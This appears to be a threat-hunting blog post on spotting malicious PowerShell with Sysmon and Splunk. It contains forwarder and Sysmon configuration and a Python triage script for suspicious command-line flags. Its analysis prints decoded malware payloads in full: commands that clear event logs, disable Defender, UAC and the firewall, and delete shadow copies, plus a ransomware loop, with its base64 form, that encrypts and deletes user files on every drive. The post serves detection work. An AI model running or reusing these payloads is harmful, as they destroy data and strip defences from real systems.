Windows PowerShell is a command shell that is very useful for administrative purposes, but at the same time it can be abused across the different phases of an intrusion and is actively used by malware developers. For these reasons, I'm interested in hunting, using Sysmon and Splunk, for PowerShell being used for bad purposes. The setup is very simple: Windows machine(s) with the Splunk Universal Forwarder and Sysmon. The two files that need to be configured are inputs.conf and config.xml.
A simple inputs.conf file in the forwarder is the following:
C:\Program Files\SplunkUniversalForwarder\etc\apps\SplunkUniversalForwarder\default\inputs.conf
# Version 6.4.5
# these here just override and disable stuff that in system/default.

################################
# Data thru parsingQueue always
################################
[splunktcp]
route=has_key:tautology:parsingQueue;absent_key:tautology:parsingQueue

################################
# Make sure these get forwarded
################################
[monitor://$SPLUNK_HOME\var\log\splunk\splunkd.log]
_TCP_ROUTING = *
index = _internal

[monitor://$SPLUNK_HOME\var\log\splunk\metrics.log]
_TCP_ROUTING = *
index = _internal

[WinEventLog://Microsoft-Windows-Sysmon/Operational]
disabled = false
renderXml = true
Regarding the config.xml file for Sysmon, it is key to customise the file for each specific environment in order to reduce the noise and catch all the interesting events. In my case, I have used a very simple one which works for my test environment and doesn't create much noise. A more advanced template is the one created by @SwiftOnSecurity.
<Sysmon schemaversion="3.2">
  <HashAlgorithms>MD5</HashAlgorithms>
  <EventFiltering>
    <!-- Log all drivers except if the signature -->
    <!-- contains Microsoft or Windows -->
    <DriverLoad onmatch="exclude">
      <Signature condition="contains">microsoft</Signature>
      <Signature condition="contains">windows</Signature>
    </DriverLoad>
    <NetworkConnect onmatch="include">
      <DestinationPort>443</DestinationPort>
      <DestinationPort>80</DestinationPort>
    </NetworkConnect>
    <!-- Exclude certain processes that cause high event volumes -->
    <ProcessCreate onmatch="exclude">
      <Image condition="contains">splunk</Image>
      <Image condition="contains">streamfwd</Image>
      <Image condition="contains">splunkd</Image>
      <Image condition="contains">splunkD</Image>
      <Image condition="contains">splunk</Image>
      <Image condition="contains">splunk-optimize</Image>
      <Image condition="contains">splunk-MonitorNoHandle</Image>
      <Image condition="contains">splunk-admon</Image>
      <Image condition="contains">splunk-netmon</Image>
      <Image condition="contains">splunk-regmon</Image>
      <Image condition="contains">splunk-winprintmon</Image>
      <Image condition="contains">btool</Image>
      <Image condition="contains">PYTHON</Image>
    </ProcessCreate>
    <ProcessTerminate onmatch="exclude">
      <Image condition="contains">splunk</Image>
      <Image condition="contains">streamfwd</Image>
      <Image condition="contains">splunkd</Image>
      <Image condition="contains">splunkD</Image>
      <Image condition="contains">splunk</Image>
      <Image condition="contains">splunk-optimize</Image>
      <Image condition="contains">splunk-MonitorNoHandle</Image>
      <Image condition="contains">splunk-admon</Image>
      <Image condition="contains">splunk-netmon</Image>
      <Image condition="contains">splunk-regmon</Image>
      <Image condition="contains">splunk-winprintmon</Image>
      <Image condition="contains">btool</Image>
      <Image condition="contains">PYTHON</Image>
    </ProcessTerminate>
    <FileCreateTime onmatch="exclude">
      <Image condition="contains">splunk</Image>
      <Image condition="contains">streamfwd</Image>
      <Image condition="contains">splunkd</Image>
      <Image condition="contains">splunkD</Image>
      <Image condition="contains">splunk</Image>
      <Image condition="contains">splunk-optimize</Image>
      <Image condition="contains">splunk-MonitorNoHandle</Image>
      <Image condition="contains">splunk-admon</Image>
      <Image condition="contains">splunk-netmon</Image>
      <Image condition="contains">splunk-regmon</Image>
      <Image condition="contains">splunk-winprintmon</Image>
      <Image condition="contains">btool</Image>
      <Image condition="contains">PYTHON</Image>
    </FileCreateTime>
  </EventFiltering>
</Sysmon>
As I said, I'm interested in any PowerShell command spawned and the parent process associated with it. With a simple SPL query I get straight away all the PowerShell commands executed, as shown below.
Let's analyse each of the PowerShell commands executed, as listed in the screenshot above.
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden cmd /c SafetyTest.rar
This command uses the 'ExecutionPolicy bypass' option. According to some documentation, the PowerShell Execution Policy was not designed as a security control but as a control to limit mistakes made by sysadmins: https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/
In any case, any PowerShell command using that option should be considered suspicious.
It also runs with the option 'windowstyle hidden' to hide the prompt. Although this is not a bad indicator per se, and some valid scripts run in the background with this option, this indicator together with any other additional indicator should raise an alert.
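The flag checks described above can be turned into a small triage routine. What follows is an added example, not code from the original post, written in Python rather than SPL so it can be run offline over exported CommandLine values. The parameter table and its minimum abbreviations are my assumption about how powershell.exe resolves prefixes (-win, -enc, -NoP and so on) and should be checked against the PowerShell build in your environment; the sample events are constructed, with two of the command lines taken from this page.

```python
import re

# powershell.exe parameter names, the shortest prefix accepted for each, and whether the
# parameter consumes the next token as its value. Assumption, not from the page: this mirrors
# the console host's prefix matching as I know it (-w/-win -> WindowStyle, -e/-enc -> EncodedCommand,
# -ex/-ep -> ExecutionPolicy, -nop -> NoProfile, -noni -> NonInteractive); check the minimums
# against the PowerShell build you monitor.
PS_PARAMS = [
    ("noexit", "noe", False),
    ("noprofile", "nop", False),
    ("nologo", "nol", False),
    ("noninteractive", "noni", False),
    ("windowstyle", "w", True),
    ("file", "f", True),
    ("command", "c", True),
    ("executionpolicy", "ex", True),
    ("encodedcommand", "e", True),
    ("inputformat", "i", True),
    ("outputformat", "o", True),
    ("sta", "sta", False),
    ("mta", "mta", False),
]
PS_ALIASES = {"ep": "executionpolicy", "ec": "encodedcommand"}


def resolve_param(key):
    """Map an abbreviated switch (without its leading '-') to (full name, takes_value)."""
    key = PS_ALIASES.get(key.lower(), key.lower())
    for full, shortest, takes_value in PS_PARAMS:
        if full.startswith(key) and len(key) >= len(shortest):
            return full, takes_value
    return None, False


def parse_powershell_cmdline(cmdline):
    """Split a Sysmon CommandLine into recognised switches plus the trailing positional
    text (the command or script itself). Double-quoted tokens are kept whole."""
    tokens = re.findall(r'"[^"]*"|\S+', cmdline)
    params = {"_image": tokens[0].strip('"') if tokens else "", "_rest": ""}
    i = 1
    while i < len(tokens):
        tok = tokens[i]
        full, takes_value = (None, False)
        if tok[:1] in ("-", "/"):
            full, takes_value = resolve_param(tok[1:])
        if full is None:                       # first positional token: everything else is the command
            params["_rest"] = " ".join(tokens[i:])
            break
        if full == "command":                  # -Command swallows the remainder of the line
            params[full] = " ".join(tokens[i + 1:])
            break
        if takes_value:
            params[full] = tokens[i + 1] if i + 1 < len(tokens) else ""
            i += 2
        else:
            params[full] = True
            i += 1
    return params


def triage(cmdline):
    """Return the reasons a PowerShell command line looks suspicious, in a fixed order."""
    p = parse_powershell_cmdline(cmdline)
    reasons = []
    policy = str(p.get("executionpolicy", "")).lower()
    if policy in ("bypass", "unrestricted"):
        reasons.append("executionpolicy " + policy)
    if str(p.get("windowstyle", "")).lower() == "hidden":
        reasons.append("windowstyle hidden")
    for switch in ("noprofile", "noninteractive"):
        if switch in p:
            reasons.append(switch)
    if "encodedcommand" in p:
        reasons.append("encodedcommand")
    tail = p["_rest"] + " " + str(p.get("command", ""))
    # cmd /c handed a file whose extension is not something cmd would normally execute
    if re.search(r"\bcmd(?:\.exe)?\s+/c\s+\S*\.(?:rar|zip|jpg|png|pdf|txt|gif)\b", tail, re.I):
        reasons.append("cmd /c on a file with a non-executable extension")
    return reasons


def should_alert(cmdline):
    """One indicator on its own (a hidden window, say) is tolerable; two or more together are not."""
    return len(triage(cmdline)) >= 2


# Constructed Sysmon Event ID 1 style records: the first two command lines are from this page
# (the encoded payload replaced by a placeholder), the third is a benign-looking one for contrast.
SAMPLE_EVENTS = [
    {"CommandLine": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden cmd /c SafetyTest.rar'},
    {"CommandLine": r"powershell.exe -NoP -sta -NonI -W Hidden -Enc ENCODED_PAYLOAD_PLACEHOLDER"},
    {"CommandLine": r"powershell.exe -NoProfile -File C:\Scripts\nightly-backup.ps1"},
]


def run_triage(events):
    return [(e["CommandLine"], triage(e["CommandLine"]), should_alert(e["CommandLine"])) for e in events]


if __name__ == "__main__":
    for cmd, reasons, alert in run_triage(SAMPLE_EVENTS):
        print(("ALERT  " if alert else "info   ") + "; ".join(reasons) + "  <- " + cmd[:70])
```

The two-indicator threshold in should_alert is the rule stated above: a hidden window or a suppressed profile alone is routine for scheduled scripts, but bypass plus hidden plus a data file handed to cmd /c is not.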
In the command above there is another suspicious thing: the 'rar' extension of the file executed by PowerShell. Looking at any process launched by that command (that is, any process with it as ParentCommandLine), I get the following:
So basically, I see that the PowerShell command invokes cmd.exe to execute the 'rar' file, which means it is not a compressed 'rar' file. Following the flow, I see that SafetyTest.rar invokes another command: "C:\Users\angel\AppData\Local\Temp\Trojan.exe"
netsh firewall add allowedprogram "C:\Users\angel\AppData\Local\Temp\Trojan.exe" "Trojan.exe" ENABLE
Trojan.exe creates a firewall rule to allow itself through the firewall, a very suspicious activity; further investigation should be done on that system.
powershell -win hidden -enc
The command, when decoded, contains the following set of commands:
while($true){
wevtutil el | Foreach-Object {wevtutil cl "$_"}
REG add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 2 /f
REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
net stop VSS; REG add "HKLM\SYSTEM\CurrentControlSet\services\VSS" /v Start /t REG_DWORD /d 4 /f; vssadmin delete shadows /for=c: /all /quiet; vssadmin delete shadows /for=d: /all /quiet; vssadmin delete shadows /for=e: /all /quiet; vssadmin delete shadows /for=f: /all /quiet; vssadmin delete shadows /for=g: /all /quiet; vssadmin delete shadows /for=x: /all /quiet; vssadmin delete shadows /for=y: /all /quiet; vssadmin delete shadows /for=z: /all /quiet
netsh advfirewall set allprofiles state off
sc config wscsvc start= disabled
REG add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
net stop WinDefend; sc config WinDefend= disabled; REG add "HKLM\SYSTEM\CurrentControlSet\services\WinDefend" /v Start /t REG_DWORD /d 4 /f; REG add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f; sc delete windefend
REG add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v EnableSmartScreen /t REG_DWORD /d 0 /f; REG add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v EnableSmartScreen /t REG_DWORD /d 0 /f
net stop wuauserv
Net user $env:USERNAME /active:no
#YCkill -processname lsass -Force; kill -processname smss -Force; kill -processname conhost -Force; kill -processname dwm -Force; kill -processname svchost -Force; kill -processname explorer -Force
kill -processname steam -Force; Remove-Item (${env:ProgramFiles(x86)} + "\Steam") -Recurse -Force
kill -processname skype -Force; Remove-Item ($env:APPDATA + "\Skype") -Recurse -Force
kill -processname ts3client_win64 -Force; Remove-Item ($env:APPDATA + "\TS3Client") -Recurse -Force
REG add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f
Remove-Item ([environment]::getfolderpath("Desktop") + "\*.*") -Recurse -Force; Remove-Item "C:\Users\Public\Desktop\*.*" -Recurse -Force
REG add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t REG_DWORD /d 1 /f
#ZAkill -processname IExplore -Force; kill -processname MicrosoftEdge -Force
kill -processname Steam -Force
kill -processname Skype -Force
#ZDkill -processname Chrome -Force
kill -processname Firefox -Force
kill -processname ts3client_win64 -Force
kill -processname Origin -Force
kill -processname Word -Force
kill -processname Excel -Force
kill -processname Powerpoint -Force
kill -processname Pidgin -Force
kill -processname Opera -Force
kill -processname CyberGhost -Force
kill -processname iTunes -Force; kill -processname iTunesHelper -Force; kill -processname iPodService -Force
kill -processname vlc -Force
powershell -win hidden -enc JABwAGEAcwBzAD0AKAAnAEkAdwBCAEgAQQBHADgAQQBOAHcAQgBTAEEARABjAEEAYwBBAEIAbABBAEcAUQBBAFEAZwBCADUAQQBIAGMAQQBZAFEAQgA2AEEARwBrAEEAZQBBAEEAagBBAEEAPQA9ACcAKQANAAoAJABkAHIAaQB2AGUAcwAgAD0AIAA2ADUALgAuADkAMAAgAHwAIABmAG8AcgBlAGEAYwBoACAAewBbAGMAaABhAHIAXQAkAF8AfQANAAoAZgBvAHIAZQBhAGMAaAAgACgAJABkAHIAdgAgAGkAbgAgACQAZAByAGkAdgBlAHMAKQAgAHsAZgBvAHIAZQBhAGMAaAAoACQAaQB0AGUAbQAgAGkAbgAgACgARwBlAHQALQBDAGgAaQBsAGQAaQB0AGUAbQAgACgAJABkAHIAdgAgACsAIAAiADoAXAAiACkAIAAtAHIAZQBjAHUAcgBzAGUAIAAtAGYAaQBsAHQAZQByACAAIgAqAC4AagBwAGcAIgApACkAewBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABoAGUAbABwAGUAcgAuAGUAeABlACAALQBlACAAJABwAGEAcwBzACAAJABpAHQAZQBtAC4ARgB1AGwAbABOAGEAbQBlACAAKAAkAGkAdABlAG0ALgBGAHUAbABsAE4AYQBtAGUAIAArACAAIgAuAGMAcgB5AHAAdAAiACkAOwAgAFIAZQBtAG8AdgBlAC0ASQB0AGUAbQAgACQAaQB0AGUAbQAuAEYAdQBsAGwATgBhAG0AZQB9AH0ADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAZAByAHYAIABpAG4AIAAkAGQAcgBpAHYAZQBzACkAIAB7AGYAbwByAGUAYQBjAGgAKAAkAGkAdABlAG0AIABpAG4AIAAoAEcAZQB0AC0AQwBoAGkAbABkAGkAdABlAG0AIAAoACQAZAByAHYAIAArACAAIgA6AFwAIgApACAALQByAGUAYwB1AHIAcwBlACAALQBmAGkAbAB0AGUAcgAgACIAKgAuAGoAcABlAGcAIgApACkAewBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABoAGUAbABwAGUAcgAuAGUAeABlACAALQBlACAAJABwAGEAcwBzACAAJABpAHQAZQBtAC4ARgB1AGwAbABOAGEAbQBlACAAKAAkAGkAdABlAG0ALgBGAHUAbABsAE4AYQBtAGUAIAArACAAIgAuAGMAcgB5AHAAdAAiACkAOwAgAFIAZQBtAG8AdgBlAC0ASQB0AGUAbQAgACQAaQB0AGUAbQAuAEYAdQBsAGwATgBhAG0AZQB9AH0ADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAZAByAHYAIABpAG4AIAAkAGQAcgBpAHYAZQBzACkAIAB7AGYAbwByAGUAYQBjAGgAKAAkAGkAdABlAG0AIABpAG4AIAAoAEcAZQB0AC0AQwBoAGkAbABkAGkAdABlAG0AIAAoACQAZAByAHYAIAArACAAIgA6AFwAIgApACAALQByAGUAYwB1AHIAcwBlACAALQBmAGkAbAB0AGUAcgAgACIAKgAuAGQAbwBjAHgAIgApACkAewBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABoAGUAbABwAGUAcgAuAGUAeABlACAALQBlACAAJABwAGEAcwBzACAAJABpAHQAZQBtAC4ARgB1AGwAbABOAGEAbQBlACAAKAAkAGkAdABlAG0ALgBGAHUAbABsAE4AYQBtAGUAIAArACAAIgAuAGMAcgB5AHAAdAAiACkAOwAgAFIAZQBtAG8AdgBlAC0ASQB0AGUAbQAgACQAaQB0AGUAbQAuAEYAdQBsAGwATgBhAG0AZQB9AH0ADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAZABy
AHYAIABpAG4AIAAkAGQAcgBpAHYAZQBzACkAIAB7AGYAbwByAGUAYQBjAGgAKAAkAGkAdABlAG0AIABpAG4AIAAoAEcAZQB0AC0AQwBoAGkAbABkAGkAdABlAG0AIAAoACQAZAByAHYAIAArACAAIgA6AFwAIgApACAALQByAGUAYwB1AHIAcwBlACAALQBmAGkAbAB0AGUAcgAgACIAKgAuAGQAbwBjACIAKQApAHsAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAaABlAGwAcABlAHIALgBlAHgAZQAgAC0AZQAgACQAcABhAHMAcwAgACQAaQB0AGUAbQAuAEYAdQBsAGwATgBhAG0AZQAgACgAJABpAHQAZQBtAC4ARgB1AGwAbABOAGEAbQBlACAAKwAgACIALgBjAHIAeQBwAHQAIgApADsAIABSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAkAGkAdABlAG0ALgBGAHUAbABsAE4AYQBtAGUAfQB9AA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAGQAcgB2ACAAaQBuACAAJABkAHIAaQB2AGUAcwApACAAewBmAG8AcgBlAGEAYwBoACgAJABpAHQAZQBtACAAaQBuACAAKABHAGUAdAAtAEMAaABpAGwAZABpAHQAZQBtACAAKAAkAGQAcgB2ACAAKwAgACIAOgBcACIAKQAgAC0AcgBlAGMAdQByAHMAZQAgAC0AZgBpAGwAdABlAHIAIAAiACoALgB4AGwAcwB4ACIAKQApAHsAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAaABlAGwAcABlAHIALgBlAHgAZQAgAC0AZQAgACQAcABhAHMAcwAgACQAaQB0AGUAbQAuAEYAdQBsAGwATgBhAG0AZQAgACgAJABpAHQAZQBtAC4ARgB1AGwAbABOAGEAbQBlACAAKwAgACIALgBjAHIAeQBwAHQAIgApADsAIABSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAkAGkAdABlAG0ALgBGAHUAbABsAE4AYQBtAGUAfQB9AA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAGQAcgB2ACAAaQBuACAAJABkAHIAaQB2AGUAcwApACAAewBmAG8AcgBlAGEAYwBoACgAJABpAHQAZQBtACAAaQBuACAAKABHAGUAdAAtAEMAaABpAGwAZABpAHQAZQBtACAAKAAkAGQAcgB2ACAAKwAgACIAOgBcACIAKQAgAC0AcgBlAGMAdQByAHMAZQAgAC0AZgBpAGwAdABlAHIAIAAiACoALgB4AGwAcwAiACkAKQB7AEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAGgAZQBsAHAAZQByAC4AZQB4AGUAIAAtAGUAIAAkAHAAYQBzAHMAIAAkAGkAdABlAG0ALgBGAHUAbABsAE4AYQBtAGUAIAAoACQAaQB0AGUAbQAuAEYAdQBsAGwATgBhAG0AZQAgACsAIAAiAC4AYwByAHkAcAB0ACIAKQA7ACAAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAAJABpAHQAZQBtAC4ARgB1AGwAbABOAGEAbQBlAH0AfQANAAoAZgBvAHIAZQBhAGMAaAAgACgAJABkAHIAdgAgAGkAbgAgACQAZAByAGkAdgBlAHMAKQAgAHsAZgBvAHIAZQBhAGMAaAAoACQAaQB0AGUAbQAgAGkAbgAgACgARwBlAHQALQBDAGgAaQBsAGQAaQB0AGUAbQAgACgAJABkAHIAdgAgACsAIAAiADoAXAAiACkAIAAtAHIAZQBjAHUAcgBzAGUAIAAtAGYAaQBsAHQAZQByACAAIgAqAC4AcABwAHQAIgApACkAewBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABoAGUAbABwAGUAcgAuAGUAeABlACAALQBlACAAJABwAGEAcwBz
ACAAJABpAHQAZQBtAC4ARgB1AGwAbABOAGEAbQBlACAAKAAkAGkAdABlAG0ALgBGAHUAbABsAE4AYQBtAGUAIAArACAAIgAuAGMAcgB5AHAAdAAiACkAOwAgAFIAZQBtAG8AdgBlAC0ASQB0AGUAbQAgACQAaQB0AGUAbQAuAEYAdQBsAGwATgBhAG0AZQB9AH0ADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAZAByAHYAIABpAG4AIAAkAGQAcgBpAHYAZQBzACkAIAB7AGYAbwByAGUAYQBjAGgAKAAkAGkAdABlAG0AIABpAG4AIAAoAEcAZQB0AC0AQwBoAGkAbABkAGkAdABlAG0AIAAoACQAZAByAHYAIAArACAAIgA6AFwAIgApACAALQByAGUAYwB1AHIAcwBlACAALQBmAGkAbAB0AGUAcgAgACIAKgAuAHAAZABmACIAKQApAHsAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAaABlAGwAcABlAHIALgBlAHgAZQAgAC0AZQAgACQAcABhAHMAcwAgACQAaQB0AGUAbQAuAEYAdQBsAGwATgBhAG0AZQAgACgAJABpAHQAZQBtAC4ARgB1AGwAbABOAGEAbQBlACAAKwAgACIALgBjAHIAeQBwAHQAIgApADsAIABSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAkAGkAdABlAG0ALgBGAHUAbABsAE4AYQBtAGUAfQB9AA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAGQAcgB2ACAAaQBuACAAJABkAHIAaQB2AGUAcwApACAAewBmAG8AcgBlAGEAYwBoACgAJABpAHQAZQBtACAAaQBuACAAKABHAGUAdAAtAEMAaABpAGwAZABpAHQAZQBtACAAKAAkAGQAcgB2ACAAKwAgACIAOgBcACIAKQAgAC0AcgBlAGMAdQByAHMAZQAgAC0AZgBpAGwAdABlAHIAIAAiACoALgBtAHAANAAiACkAKQB7AEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAGgAZQBsAHAAZQByAC4AZQB4AGUAIAAtAGUAIAAkAHAAYQBzAHMAIAAkAGkAdABlAG0ALgBGAHUAbABsAE4AYQBtAGUAIAAoACQAaQB0AGUAbQAuAEYAdQBsAGwATgBhAG0AZQAgACsAIAAiAC4AYwByAHkAcAB0ACIAKQA7ACAAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAAJABpAHQAZQBtAC4ARgB1AGwAbABOAGEAbQBlAH0AfQANAAoAZgBvAHIAZQBhAGMAaAAgACgAJABkAHIAdgAgAGkAbgAgACQAZAByAGkAdgBlAHMAKQAgAHsAZgBvAHIAZQBhAGMAaAAoACQAaQB0AGUAbQAgAGkAbgAgACgARwBlAHQALQBDAGgAaQBsAGQAaQB0AGUAbQAgACgAJABkAHIAdgAgACsAIAAiADoAXAAiACkAIAAtAHIAZQBjAHUAcgBzAGUAIAAtAGYAaQBsAHQAZQByACAAIgAqAC4AbQBwADMAIgApACkAewBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABoAGUAbABwAGUAcgAuAGUAeABlACAALQBlACAAJABwAGEAcwBzACAAJABpAHQAZQBtAC4ARgB1AGwAbABOAGEAbQBlACAAKAAkAGkAdABlAG0ALgBGAHUAbABsAE4AYQBtAGUAIAArACAAIgAuAGMAcgB5AHAAdAAiACkAOwAgAFIAZQBtAG8AdgBlAC0ASQB0AGUAbQAgACQAaQB0AGUAbQAuAEYAdQBsAGwATgBhAG0AZQB9AH0ADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAZAByAHYAIABpAG4AIAAkAGQAcgBpAHYAZQBzACkAIAB7AGYAbwByAGUAYQBjAGgAKAAkAGkAdABlAG0AIABpAG4AIAAoAEcAZQB0
AC0AQwBoAGkAbABkAGkAdABlAG0AIAAoACQAZAByAHYAIAArACAAIgA6AFwAIgApACAALQByAGUAYwB1AHIAcwBlACAALQBmAGkAbAB0AGUAcgAgACIAKgAuAG0AbwB2ACIAKQApAHsAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAaABlAGwAcABlAHIALgBlAHgAZQAgAC0AZQAgACQAcABhAHMAcwAgACQAaQB0AGUAbQAuAEYAdQBsAGwATgBhAG0AZQAgACgAJABpAHQAZQBtAC4ARgB1AGwAbABOAGEAbQBlACAAKwAgACIALgBjAHIAeQBwAHQAIgApADsAIABSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAkAGkAdABlAG0ALgBGAHUAbABsAE4AYQBtAGUAfQB9AA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAGQAcgB2ACAAaQBuACAAJABkAHIAaQB2AGUAcwApACAAewBmAG8AcgBlAGEAYwBoACgAJABpAHQAZQBtACAAaQBuACAAKABHAGUAdAAtAEMAaABpAGwAZABpAHQAZQBtACAAKAAkAGQAcgB2ACAAKwAgACIAOgBcACIAKQAgAC0AcgBlAGMAdQByAHMAZQAgAC0AZgBpAGwAdABlAHIAIAAiACoALgBtAGsAdgAiACkAKQB7AEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAGgAZQBsAHAAZQByAC4AZQB4AGUAIAAtAGUAIAAkAHAAYQBzAHMAIAAkAGkAdABlAG0ALgBGAHUAbABsAE4AYQBtAGUAIAAoACQAaQB0AGUAbQAuAEYAdQBsAGwATgBhAG0AZQAgACsAIAAiAC4AYwByAHkAcAB0ACIAKQA7ACAAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAAJABpAHQAZQBtAC4ARgB1AGwAbABOAGEAbQBlAH0AfQANAAoAZgBvAHIAZQBhAGMAaAAgACgAJABkAHIAdgAgAGkAbgAgACQAZAByAGkAdgBlAHMAKQAgAHsAZgBvAHIAZQBhAGMAaAAoACQAaQB0AGUAbQAgAGkAbgAgACgARwBlAHQALQBDAGgAaQBsAGQAaQB0AGUAbQAgACgAJABkAHIAdgAgACsAIAAiADoAXAAiACkAIAAtAHIAZQBjAHUAcgBzAGUAIAAtAGYAaQBsAHQAZQByACAAIgAqAC4AcABuAGcAIgApACkAewBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABoAGUAbABwAGUAcgAuAGUAeABlACAALQBlACAAJABwAGEAcwBzACAAJABpAHQAZQBtAC4ARgB1AGwAbABOAGEAbQBlACAAKAAkAGkAdABlAG0ALgBGAHUAbABsAE4AYQBtAGUAIAArACAAIgAuAGMAcgB5AHAAdAAiACkAOwAgAFIAZQBtAG8AdgBlAC0ASQB0AGUAbQAgACQAaQB0AGUAbQAuAEYAdQBsAGwATgBhAG0AZQB9AH0ADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAZAByAHYAIABpAG4AIAAkAGQAcgBpAHYAZQBzACkAIAB7AGYAbwByAGUAYQBjAGgAKAAkAGkAdABlAG0AIABpAG4AIAAoAEcAZQB0AC0AQwBoAGkAbABkAGkAdABlAG0AIAAoACQAZAByAHYAIAArACAAIgA6AFwAIgApACAALQByAGUAYwB1AHIAcwBlACAALQBmAGkAbAB0AGUAcgAgACIAKgAuAHAAcwB0ACIAKQApAHsAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAaABlAGwAcABlAHIALgBlAHgAZQAgAC0AZQAgACQAcABhAHMAcwAgACQAaQB0AGUAbQAuAEYAdQBsAGwATgBhAG0AZQAgACgAJABpAHQAZQBtAC4ARgB1AGwAbABOAGEAbQBlACAAKwAgACIALgBj
AHIAeQBwAHQAIgApADsAIABSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAkAGkAdABlAG0ALgBGAHUAbABsAE4AYQBtAGUAfQB9AA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAGQAcgB2ACAAaQBuACAAJABkAHIAaQB2AGUAcwApACAAewBmAG8AcgBlAGEAY...
$pass=('IwBHAG8ANwBSADcAcABlAGQAQgB5AHcAYQB6AGkAeAAjAA==')
$drives = 65..90 | foreach {[char]$_}
foreach ($drv in $drives) {foreach($item in (Get-Childitem ($drv + ":\") -recurse -filter "*.jpg")){C:\ProgramData\helper.exe -e $pass $item.FullName ($item.FullName + ".crypt"); Remove-Item $item.FullName}}
foreach ($drv in $drives) {foreach($item in (Get-Childitem ($drv + ":\") -recurse -filter "*.jpeg")){C:\ProgramData\helper.exe -e $pass $item.FullName ($item.FullName + ".crypt"); Remove-Item $item.FullName}}
foreach ($drv in $drives) {foreach($item in (Get-Childitem ($drv + ":\") -recurse -filter "*.docx")){C:\ProgramData\helper.exe -e $pass $item.FullName ($item.FullName + ".crypt"); Remove-Item $item.FullName}}
foreach ($drv in $drives) {foreach($item in (Get-Childitem ($drv + ":\") -recurse -filter "*.doc")){C:\ProgramData\helper.exe -e $pass $item.FullName ($item.FullName + ".crypt"); Remove-Item $item.FullName}}
foreach ($drv in $drives) {foreach($item in (Get-Childitem ($drv + ":\") -recurse -filter "*.xlsx")){C:\ProgramData\helper.exe -e $pass $item.FullName ($item.FullName + ".crypt"); Remove-Item $item.FullName}}
foreach ($drv in $drives) {foreach($item in (Get-Childitem ($drv + ":\") -recurse -filter "*.xls")){C:\ProgramData\helper.exe -e $pass $item.FullName ($item.FullName + ".crypt"); Remove-Item $item.FullName}}
foreach ($drv in $drives) {foreach($item in (Get-Childitem ($drv + ":\") -recurse -filter "*.ppt")){C:\ProgramData\helper.exe -e $pass $item.FullName ($item.FullName + ".crypt"); Remove-Item $item.FullName}}
foreach ($drv in $drives) {foreach($item in (Get-Childitem ($drv + ":\") -recurse -filter "*.pdf")){C:\ProgramData\helper.exe -e $pass $item.FullName ($item.FullName + ".crypt"); Remove-Item $item.FullName}}
foreach ($drv in $drives) {foreach($item in (Get-Childitem ($drv + ":\") -recurse -filter "*.mp4")){C:\ProgramData\helper.exe -e $pass $item.FullName ($item.FullName + ".crypt"); Remove-Item $item.FullName}}
foreach ($drv in $drives) {foreach($item in (Get-Childitem ($drv + ":\") -recurse -filter "*.mp3")){C:\ProgramData\helper.exe -e $pass $item.FullName ($item.FullName + ".crypt"); Remove-Item $item.FullName}}
foreach ($drv in $drives) {foreach($item in (Get-Childitem ($drv + ":\") -recurse -filter "*.mov")){C:\ProgramData\helper.exe -e $pass $item.FullName ($item.FullName + ".crypt"); Remove-Item $item.FullName}}
foreach ($drv in $drives) {foreach($item in (Get-Childitem ($drv + ":\") -recurse -filter "*.mkv")){C:\ProgramData\helper.exe -e $pass $item.FullName ($item.FullName + ".crypt"); Remove-Item $item.FullName}}
